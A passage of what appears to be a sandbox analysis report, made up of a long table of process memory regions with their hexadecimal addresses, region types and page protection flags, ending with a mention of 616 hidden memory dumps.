page read and write
|
||
|
247E3981000
|
trusted library allocation
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
247E4201000
|
trusted library allocation
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
6440A4F000
|
stack
|
page read and write
|
||
|
23822D68000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
60A9000
|
trusted library allocation
|
page read and write
|
||
|
6440ACD000
|
stack
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
247E3840000
|
heap
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
7FFB4B010000
|
trusted library allocation
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
247FBE63000
|
trusted library allocation
|
page read and write
|
||
|
23822E62000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
77BE000
|
stack
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
23820D8E000
|
heap
|
page read and write
|
||
|
23822860000
|
remote allocation
|
page read and write
|
||
|
7FFB4AEF0000
|
trusted library allocation
|
page read and write
|
||
|
247E1CDC000
|
heap
|
page read and write
|
||
|
7BFA000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
74FF000
|
stack
|
page read and write
|
||
|
23822DCB000
|
heap
|
page read and write
|
||
|
4E7A000
|
trusted library allocation
|
page execute and read and write
|
||
|
23822E41000
|
heap
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
23822DA9000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
23820DC0000
|
heap
|
page read and write
|
||
|
23820F59000
|
heap
|
page read and write
|
||
|
4FAC000
|
stack
|
page read and write
|
||
|
247FBF8D000
|
heap
|
page read and write
|
||
|
8CC5000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
7D2D000
|
trusted library allocation
|
page read and write
|
||
|
23822DE4000
|
heap
|
page read and write
|
||
|
247E40B1000
|
trusted library allocation
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
3800000
|
heap
|
page read and write
|
||
|
23822DAF000
|
heap
|
page read and write
|
||
|
23822DCB000
|
heap
|
page read and write
|
||
|
247E3E6F000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF40000
|
trusted library allocation
|
page execute and read and write
|
||
|
247E4DF0000
|
trusted library allocation
|
page read and write
|
||
|
247FBEC0000
|
heap
|
page read and write
|
||
|
247E57A6000
|
trusted library allocation
|
page read and write
|
||
|
247E3BA8000
|
trusted library allocation
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
8930000
|
trusted library allocation
|
page execute and read and write
|
||
|
23820DB9000
|
heap
|
page read and write
|
||
|
747E000
|
stack
|
page read and write
|
||
|
23822D65000
|
heap
|
page read and write
|
||
|
23822860000
|
remote allocation
|
page read and write
|
||
|
23822D41000
|
heap
|
page read and write
|
||
|
5000000
|
trusted library allocation
|
page execute and read and write
|
||
|
247E37E5000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
23822C64000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
247E412B000
|
trusted library allocation
|
page read and write
|
||
|
247E5A02000
|
trusted library allocation
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
5081000
|
trusted library allocation
|
page read and write
|
||
|
247E5771000
|
trusted library allocation
|
page read and write
|
||
|
37F0000
|
trusted library section
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
7FFB4AD60000
|
trusted library allocation
|
page read and write
|
||
|
7C4B000
|
heap
|
page read and write
|
||
|
380A000
|
heap
|
page read and write
|
||
|
8C81000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
23822C41000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
1FB974D000
|
stack
|
page read and write
|
||
|
3490000
|
heap
|
page read and write
|
||
|
7C97000
|
heap
|
page read and write
|
||
|
7C46000
|
heap
|
page read and write
|
||
|
7FFB4AD54000
|
trusted library allocation
|
page read and write
|
||
|
23822C41000
|
heap
|
page read and write
|
||
|
643FF7E000
|
stack
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
7FFB4AD53000
|
trusted library allocation
|
page execute and read and write
|
||
|
8E90000
|
trusted library allocation
|
page read and write
|
||
|
300E000
|
stack
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
247F39A1000
|
trusted library allocation
|
page read and write
|
||
|
643FEFE000
|
stack
|
page read and write
|
||
|
23820F58000
|
heap
|
page read and write
|
||
|
247E1C5A000
|
heap
|
page read and write
|
||
|
23822DD2000
|
heap
|
page read and write
|
||
|
247E3934000
|
heap
|
page read and write
|
||
|
247E38E9000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
247E578C000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
643FBF9000
|
stack
|
page read and write
|
||
|
247E1CE5000
|
heap
|
page read and write
|
||
|
247E41F3000
|
trusted library allocation
|
page read and write
|
||
|
8CB5000
|
heap
|
page read and write
|
||
|
23822D89000
|
heap
|
page read and write
|
||
|
23822C64000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
89C0000
|
heap
|
page read and write
|
||
|
7F40000
|
trusted library allocation
|
page read and write
|
||
|
33E0000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
75DB000
|
stack
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
4E85000
|
trusted library allocation
|
page execute and read and write
|
||
|
643F5BE000
|
stack
|
page read and write
|
||
|
23822EE3000
|
heap
|
page read and write
|
||
|
23822C53000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822E41000
|
heap
|
page read and write
|
||
|
73FF000
|
stack
|
page read and write
|
||
|
34C0000
|
heap
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
247E57FB000
|
trusted library allocation
|
page read and write
|
||
|
8E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
8EC0000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23822C44000
|
heap
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
247E3E36000
|
trusted library allocation
|
page read and write
|
||
|
23822D89000
|
heap
|
page read and write
|
||
|
247E1CDA000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
7CA8000
|
trusted library allocation
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
5010000
|
trusted library allocation
|
page read and write
|
||
|
247E3844000
|
heap
|
page read and write
|
||
|
643FB7E000
|
stack
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
247E1C40000
|
trusted library section
|
page read and write
|
||
|
7FFB4AF0A000
|
trusted library allocation
|
page read and write
|
||
|
247E3610000
|
trusted library allocation
|
page read and write
|
||
|
247E3680000
|
trusted library allocation
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
7FFB4AE70000
|
trusted library allocation
|
page execute and read and write
|
||
|
643F87E000
|
stack
|
page read and write
|
||
|
247E3E45000
|
trusted library allocation
|
page read and write
|
||
|
23822DC2000
|
heap
|
page read and write
|
||
|
247E3970000
|
heap
|
page execute and read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
643FA7E000
|
stack
|
page read and write
|
||
|
34F6000
|
heap
|
page read and write
|
||
|
247E1C94000
|
heap
|
page read and write
|
||
|
7FFB4B000000
|
trusted library allocation
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
2382310E000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
76DA000
|
stack
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23822E41000
|
heap
|
page read and write
|
||
|
23822C5C000
|
heap
|
page read and write
|
||
|
4F2E000
|
stack
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
15285F44000
|
heap
|
page read and write
|
||
|
23822DBD000
|
heap
|
page read and write
|
||
|
8940000
|
trusted library allocation
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
247E5913000
|
trusted library allocation
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
4E80000
|
trusted library allocation
|
page read and write
|
||
|
327C000
|
stack
|
page read and write
|
||
|
23820D8C000
|
heap
|
page read and write
|
||
|
23822DF5000
|
heap
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
7F10000
|
trusted library allocation
|
page read and write
|
||
|
247E3EB1000
|
trusted library allocation
|
page read and write
|
||
|
8CD5000
|
heap
|
page read and write
|
||
|
33E8000
|
heap
|
page read and write
|
||
|
1FB9AFF000
|
unkown
|
page read and write
|
||
|
23822C63000
|
heap
|
page read and write
|
||
|
247FBD60000
|
heap
|
page read and write
|
||
|
761E000
|
stack
|
page read and write
|
||
|
247F3C72000
|
trusted library allocation
|
page read and write
|
||
|
23822E91000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
23822E62000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
7EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0B0000
|
trusted library allocation
|
page read and write
|
||
|
247FBE40000
|
heap
|
page execute and read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23820DB9000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
3480000
|
trusted library section
|
page read and write
|
||
|
247E57E3000
|
trusted library allocation
|
page read and write
|
||
|
23822DCB000
|
heap
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
15285C0B000
|
heap
|
page read and write
|
||
|
23820DB9000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23822DC6000
|
heap
|
page read and write
|
||
|
247FBE60000
|
trusted library allocation
|
page read and write
|
||
|
769D000
|
stack
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
60E1000
|
trusted library allocation
|
page read and write
|
||
|
23822C64000
|
heap
|
page read and write
|
||
|
247E1CB2000
|
heap
|
page read and write
|
||
|
4FB8000
|
heap
|
page read and write
|
||
|
247E4068000
|
trusted library allocation
|
page read and write
|
||
|
23822E62000
|
heap
|
page read and write
|
||
|
7FFB4AD52000
|
trusted library allocation
|
page read and write
|
||
|
334F000
|
unkown
|
page read and write
|
||
|
7FFB4AD50000
|
trusted library allocation
|
page read and write
|
||
|
7DF493BC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
247E5752000
|
trusted library allocation
|
page read and write
|
||
|
32B9000
|
stack
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
23822D89000
|
heap
|
page read and write
|
||
|
337E000
|
stack
|
page read and write
|
||
|
7FFB4AF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AFD0000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
4E20000
|
heap
|
page read and write
|
||
|
247E1BA0000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23822E41000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
8EB0000
|
trusted library allocation
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
15285F45000
|
heap
|
page read and write
|
||
|
5070000
|
heap
|
page execute and read and write
|
||
|
247E4125000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE00000
|
trusted library allocation
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822E41000
|
heap
|
page read and write
|
||
|
7C08000
|
heap
|
page read and write
|
||
|
7FFB4AE10000
|
trusted library allocation
|
page execute and read and write
|
||
|
77FA000
|
stack
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
7FFB4AF90000
|
trusted library allocation
|
page read and write
|
||
|
23822EBF000
|
heap
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
23822C41000
|
heap
|
page read and write
|
||
|
7BC9000
|
heap
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
6325000
|
trusted library allocation
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822DC6000
|
heap
|
page read and write
|
||
|
4E69000
|
trusted library allocation
|
page read and write
|
||
|
247E1FF0000
|
heap
|
page read and write
|
||
|
7FFB4B0A0000
|
trusted library allocation
|
page read and write
|
||
|
247E3E41000
|
trusted library allocation
|
page read and write
|
||
|
79CE000
|
stack
|
page read and write
|
||
|
247E4C01000
|
trusted library allocation
|
page read and write
|
||
|
23820DB9000
|
heap
|
page read and write
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
8E80000
|
trusted library allocation
|
page read and write
|
||
|
247E3E5A000
|
trusted library allocation
|
page read and write
|
||
|
643F8FE000
|
stack
|
page read and write
|
||
|
7FFB4AF70000
|
trusted library allocation
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
247FBEB0000
|
heap
|
page execute and read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
315C000
|
heap
|
page read and write
|
||
|
6081000
|
trusted library allocation
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
247E5775000
|
trusted library allocation
|
page read and write
|
||
|
23822860000
|
remote allocation
|
page read and write
|
||
|
8A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
346F000
|
stack
|
page read and write
|
||
|
7AB2000
|
heap
|
page read and write
|
||
|
7FFB4AE06000
|
trusted library allocation
|
page read and write
|
||
|
247E1FB0000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
247F3990000
|
trusted library allocation
|
page read and write
|
||
|
247E5766000
|
trusted library allocation
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
247E56F3000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
8A30000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B070000
|
trusted library allocation
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
64409CE000
|
stack
|
page read and write
|
||
|
247E1C10000
|
heap
|
page read and write
|
||
|
23822D89000
|
heap
|
page read and write
|
||
|
8A1E000
|
stack
|
page read and write
|
||
|
23822DA9000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
247E5236000
|
trusted library allocation
|
page read and write
|
||
|
7F20000
|
trusted library allocation
|
page read and write
|
||
|
8A40000
|
trusted library allocation
|
page read and write
|
||
|
7D9E000
|
stack
|
page read and write
|
||
|
247E57E8000
|
trusted library allocation
|
page read and write
|
||
|
7F50000
|
trusted library allocation
|
page read and write
|
||
|
50E1000
|
trusted library allocation
|
page read and write
|
||
|
23820D8C000
|
heap
|
page read and write
|
||
|
7FFB4AD6B000
|
trusted library allocation
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
7870000
|
heap
|
page read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
643FD7C000
|
stack
|
page read and write
|
||
|
247FBF3C000
|
heap
|
page read and write
|
||
|
765E000
|
stack
|
page read and write
|
||
|
7D20000
|
trusted library allocation
|
page read and write
|
||
|
247E3929000
|
heap
|
page read and write
|
||
|
34CC000
|
heap
|
page read and write
|
||
|
247FBFA1000
|
heap
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
8AC5000
|
trusted library allocation
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
247E574F000
|
trusted library allocation
|
page read and write
|
||
|
23820F58000
|
heap
|
page read and write
|
||
|
6440BCB000
|
stack
|
page read and write
|
||
|
7A4E000
|
stack
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
7ED0000
|
trusted library allocation
|
page read and write
|
||
|
23822D77000
|
heap
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page read and write
|
||
|
4F58000
|
trusted library allocation
|
page read and write
|
||
|
7888000
|
heap
|
page read and write
|
||
|
8CC9000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
7BE8000
|
heap
|
page read and write
|
||
|
23822E41000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
4F40000
|
heap
|
page readonly
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
342E000
|
stack
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
7FFB4B060000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23820D36000
|
heap
|
page read and write
|
||
|
247E1C92000
|
heap
|
page read and write
|
||
|
344F000
|
stack
|
page read and write
|
||
|
7E90000
|
heap
|
page read and write
|
||
|
7FFB4AF50000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
8C99000
|
heap
|
page read and write
|
||
|
23822E65000
|
heap
|
page read and write
|
||
|
23822C58000
|
heap
|
page read and write
|
||
|
7C10000
|
heap
|
page read and write
|
||
|
7EC0000
|
trusted library allocation
|
page read and write
|
||
|
4E54000
|
trusted library allocation
|
page read and write
|
||
|
247E1BB0000
|
heap
|
page read and write
|
||
|
23820D62000
|
heap
|
page read and write
|
||
|
643F533000
|
stack
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822DAA000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
643FE7E000
|
stack
|
page read and write
|
||
|
51D6000
|
trusted library allocation
|
page read and write
|
||
|
15285BD0000
|
heap
|
page read and write
|
||
|
7FFB4AFA0000
|
trusted library allocation
|
page read and write
|
||
|
247FBF02000
|
heap
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
247E1BD0000
|
heap
|
page read and write
|
||
|
8C6C000
|
stack
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
7C74000
|
heap
|
page read and write
|
||
|
7E5D000
|
stack
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
759D000
|
stack
|
page read and write
|
||
|
15285F40000
|
heap
|
page read and write
|
||
|
7FFB4B040000
|
trusted library allocation
|
page read and write
|
||
|
1FB9BFF000
|
stack
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
7D10000
|
trusted library allocation
|
page read and write
|
||
|
23822DC6000
|
heap
|
page read and write
|
||
|
6440983000
|
stack
|
page read and write
|
||
|
23822E62000
|
heap
|
page read and write
|
||
|
247E3E2D000
|
trusted library allocation
|
page read and write
|
||
|
6091000
|
trusted library allocation
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
247E3E38000
|
trusted library allocation
|
page read and write
|
||
|
8950000
|
trusted library allocation
|
page read and write
|
||
|
4FB0000
|
heap
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
7EE0000
|
trusted library allocation
|
page read and write
|
||
|
23822C4C000
|
heap
|
page read and write
|
||
|
247E1CA0000
|
heap
|
page read and write
|
||
|
247E1FF5000
|
heap
|
page read and write
|
||
|
247E3F0A000
|
trusted library allocation
|
page read and write
|
There are 616 hidden memdumps, click here to show them.